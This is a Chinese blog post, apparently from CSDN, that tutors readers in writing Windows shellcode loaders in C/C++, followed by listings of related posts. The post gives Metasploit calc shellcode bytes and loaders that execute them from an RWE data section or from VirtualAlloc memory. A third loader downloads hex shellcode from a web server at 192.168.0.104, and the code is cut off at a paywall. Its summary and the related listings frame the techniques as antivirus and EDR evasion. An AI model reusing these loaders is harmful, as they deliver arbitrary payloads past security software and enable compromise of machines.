shellcode加载器--从入门到放弃

最新推荐文章于 2025-03-26 17:42:07 发布
最新推荐文章于 2025-03-26 17:42:07 发布
阅读量4k 收藏 17
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xmd213131/article/details/109898389
版权
本文介绍了如何使用C/C++在VS2019环境下编写shellcode加载器,涉及将shellcode放置在不同位置执行,通过socket远程加载,利用WinInet.dll动态加载,以及使用crypto++进行AES加密解密。在实际操作中,注意到解密过程存在小bug,且可能被安全软件检测,提出了改进思路,如替换易被识别的API。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

重剑无锋–代码篇复现

1.C/C++(vs2019)
(1).指针执行
shellcode放在data段
#include <windows.h>
#include <stdio.h>

//data段可读写
//linker指定一个连接选项/section:.data设置数据段可读可写可执行(rwe)
//数据段 :数据段(data segment)通常是指用来存放程序中已初始化的全局变量/静态变量的一块内存区域。数据段属于静态内存分配。
//因为buf是一个全局静态变量,因此存放在data段,不知道是不是vs的安全原因要赋予其可读可写可执行(默认data好像缺少权限执行,我没有安装gdb,没法用gdb调试查看data段的权限)。
#pragma comment(linker, "/section:.data,RWE")
//不显示窗口
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/INCREMENTAL:NO") 

//使用msf生成的弹计算器的shellcode
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

int main()

{
   
    ((void(*)()) &buf)();//将buf的首地址强转为函数指针并调用,而buf的首地址内容为shellcode
    
}
shellcode放在栈上,复制到堆上
int main()

{
   
    unsigned char buf[] =
        "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
        "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
        "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
        "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
        "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
        "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
        "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
        "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
        "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
        "\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
        "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
        "\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
    LPVOID Memory = VirtualAlloc(NULL, sizeof buf, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    //MEM_RESERVE让系统分配一块虚拟内存的地址,不让其他函数使用,保留指定地址空间,不分配物理内存。
    //MEM_COMMIT为指定地址空间提交物理内存。
    //只使用MEM_COMMIT也可以运行。
    //MEM_COMMIT标志将在页面大小边界上提交页面,而使用MEM_RESERVE或MEM_RESERVE | MEM_COMMIT将在大于页面大小的边界上保留或保留提交页面。
    /*LPVOID VirtualAlloc{
                        LPVOID lpAddress, // 要分配的内存区域的地址,NULL由系统决定
                        DWORD dwSize, // 分配的大小
                        DWORD flAllocationType, // 分配的类型
                        DWORD flProtect // 该内存的初始保护属性
    };*/
    //PAGE_EXECUTE_READWRITE 可读可写可执行
    memcpy(Memory,buf, sizeof buf);
    ((void(*)()) Memory)();//将buf的首地址强转为函数指针并调用,而buf的首地址内容为shellcode
    
}
shellcode放在web服务器上
#include <stdio.h>
#include <Windows.h>
#include <WinInet.h>
#include <iostream>
#pragma comment(lib, "WinInet.lib")
/*#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/INCREMENTAL:NO")*/

char* GetUrlPage(const wchar_t* URL, const wchar_t* SubPath)
{
   
	HINTERNET hInternet, hConnect, hRequest = NULL;
	DWORD dwOpenRequestFlags, dwRet = 0;
	unsigned char* pResponseHeaderIInfo = NULL;
	DWORD dwResponseHeaderIInfoSize = 2048;
	BYTE* pBuf = NULL;
	DWORD dwBufSize = 64 * 2048;
	hInternet = ::InternetOpen(L"WinInetGet/0.1", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
	hConnect = ::InternetConnect(hInternet,URL, INTERNET_DEFAULT_HTTP_PORT, 0, 0, INTERNET_SERVICE_HTTP, 0, 0);
	if (NULL == hConnect)
		return NULL;

	dwOpenRequestFlags = INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP | INTERNET_FLAG_KEEP_CONNECTION |
		INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_NO_UI | INTERNET_FLAG_RELOAD;

	hRequest = HttpOpenRequest(hConnect,L"GET", SubPath, NULL, NULL, NULL, dwOpenRequestFlags, 0);
	HttpSendRequest(hRequest, NULL, 0, NULL, 0);

	pResponseHeaderIInfo = new unsigned char[dwResponseHeaderIInfoSize];
	RtlZeroMemory(pResponseHeaderIInfo, dwResponseHeaderIInfoSize);
	HttpQueryInfo(hRequest, HTTP_QUERY_RAW_HEADERS_CRLF, pResponseHeaderIInfo, &dwResponseHeaderIInfoSize, NULL);
	pBuf = new BYTE[dwBufSize];

	RtlZeroMemory(pBuf, dwBufSize);
	InternetReadFile(hRequest, pBuf, dwBufSize, &dwRet);
	return (char*)pBuf;
}

int main(int argc, char* argv[])
{
   
	char* shellcode = GetUrlPage(L"192.168.0.104",L"/2");
	printf("%s \n", shellcode);
	int shellcode_length = strlen(shellcode);
	unsigned char* value = (unsigned char*)calloc(shellcode_length/2, sizeof(unsigned char));
	for (size_t count = 0; count < shellcode_length / 2; count++) {
   
		sscanf(shellcode, "%2hhx", &value[count]);
		shellcode += 2;
	}
	for (size_t count = 0; count < shellcode_length / 2; count++) {
   
		printf("%2hhx", value[count]
最低0.47元/天 解锁文章
shellcode加载器
goat_2003的博客
09-10 1714
编写shellcode不能使用绝对地址,因为当我们加载到其他函数中时绝对地址储存的可能什么也没有,甚至是其他函数,所以当我们需要调用一个函数时,需要动态获取函数的地址实现调用。 想要动态获取函数地址,可以使用以下函数 GetProcAddress 从dll中获取函数的地址 LoadLibraryA 将指定的模块加载到调用进程的地址空间中 举个例子: LPVOID lp = GetProcAddress(LoadLibraryA("user32.dll"),"MessageBoxA"); _asm {
开发知识点-C++入门到入土知识手册
aming小老弟
10-18 1175
指针经典笔试题练习题讲解typedef笔试题多个源文件-理论多个源文件-实践PBC++简述C++标准C++的应用场景第一个C++程序const修饰普通变量const修饰成员变量const修饰成员函数const修饰对象const修饰引用onst修饰函数返回值为普通变量和对象const修饰函数返回值为const的指针const修饰函数返回值为const的引用extern c的使用_cplusplus的使用string对象的构造方法string对象的赋值。
shellcode加载方式
weixin_50217210的博客
10-16 512
注:lea是“Load Effective Address ”的缩写 --加载有效地址。源文件->添加->资源->导入->CS生成的.bin文件->资源类型(xxx)在resource.h查看资源ID(#define IDR_XXX1)5.线程池等待对象回调函数执行--我最喜欢用的方式。这也是一个优质的执行方法,值得深入研究一下。7.NtTestAlert+APC执行。6.创建纤程(Fiber)执行。纤程是比线程更小的执行单位。
内网渗透-ShellCode加载上线
最新发布
zj2084的博客
03-26 176
然后将监听的Payload改为64位的,不然监听不到,然后开始运行pyth木on和run,木马上线成功。前面先引入ctypes这个库,然后加上我们生成的shellcode,最后加上这一段代码即可。我们也可以去确认一下18104是不是对应这个Python的进程。同样的方式我们可以来一下64位的Shellcode。然后使用下面的命令去生成一个shellcode。然后去查看生成的payload,生成的内容如下。进入到/home/kali/Muma目录中。接下来我使用老师的电脑进行实验。然后再使用64位的加载器
Shellcode与动态加载
tuobaofeng的专栏
05-08 918
.386 .model flat,stdcall option casemap:none include windows.inc .code;代码段 start:;好了我们开始我们的Shellcode代码 push ebp sub esp,100 mov ebp,esp;预留函数地址空间下面我们把动态库基址和函数地址都存在ebp里面 ;**********************
记一次Go语言的学习--shellcode加载器免杀
jjjjj34的博客
04-24 2716
在网上搜了很多关于Go语言的免杀,我也是刚学几天,就做个学习对于GO语言做免杀的记录。
java 加载shellcode_各种语言实现Shellcode加载(暂时两种)
weixin_39660931的博客
02-26 559
原理:使用Shellcode加载器分离的方法,方法很low,但是值得尝试Python参考自K8Shellcode混合加密造轮子,造轮子QAQ(K8师傅的那个已经过不了检测了)编译用法的话则是结果如下虽然VT检出率挺高的但是过360还是可以的估计动态免杀是过不了的参考资料C/C++语言实现Shellcode加载Shellcode的代码C++这些东西还是不太懂得,大约就是申请虚拟内存,将shel...
Shellcode编写全解】:CTF中的Shellcode编写 - 从编写到注入的全过程解析
[【Shellcode编写全解】:CTF中的Shellcode编写 - 从编写到注入的全过程解析](https://www.null-byte.org/wp-content/uploads/2012/04/null-byte-vmware-slide41.jpg) # 摘要 本文全面探讨了Shellcode的基础知识、...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4782
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 1950
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
Shellcode提取、加载与解析
莫慌的博客
03-06 2297
msf的shellcode 如何实现的
一段动态装载DLL的ShellCode汇编代码
09-10
一段动态装载DLL的ShellCode汇编代码,不需要引入任何的库
使用shellcode动态加载dll-易语言
06-11
注入dll,执行代码啥的
SimpleShellcode:利用图片隐写术来远程动态加载shellcode
05-27
0x01 前言 将Shellcode隐写到正常BMP图片中,把字符串拆成字节,写入每个像素的alpha通道中,然后上传到可信任的网站下偏移拼接shellcode进行远程动态加载,能有效地增加了免杀性和隐匿性。 0x02 参考链接
NimShellCodeLoader:使用nim编写的shellcode加载器
02-03
NimShellCodeLoader Nim编写Windows平台shellcode免杀加载器 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件拥有不同的哈希 完全针对技术研究和获得正式授权的测试活动。 ##文件组成: bin中存放生成的重组文件 encryption存储加密代码文件 module中存放c ++功能文件 安装: 1,安装nim最新版 2,下载本项目,分别编译encryption中的Tdea.nim和Caesar.nim 。 nim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 3,编译c#项目,将初始化文件放到当前目录 使用方法: 1,打开生成器 2,将有效载荷到该窗口 3,选择加载方式,点击生成,还原文件会保存到bin文件夹中 拓展: 1,新建ni
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
0基础写shellcode加载器
qq_60870726的博客
11-12 1568
从0开始了解shellcode加载器
动态加载 ShellCode绕过杀软
优快云
08-11 6105
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virscan作为我们的检测工具,并使用Metasploit生成一些反向的ShellCode作为我们的攻击载荷。
转载-shellcode加载总结
weixin_44201513的博客
06-28 686
转载-
DripLoader: 高效绕过EDR的Evasive Shellcode加载器
- Shellcode加载器Shellcode加载器是一种程序,其主要功能是将shellcode注入到目标进程的内存中并执行。DripLoader正是为了提高其隐蔽性而设计的。 - EDR绕过技术:随着安全产品的发展,攻击者也在不断寻找新的...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值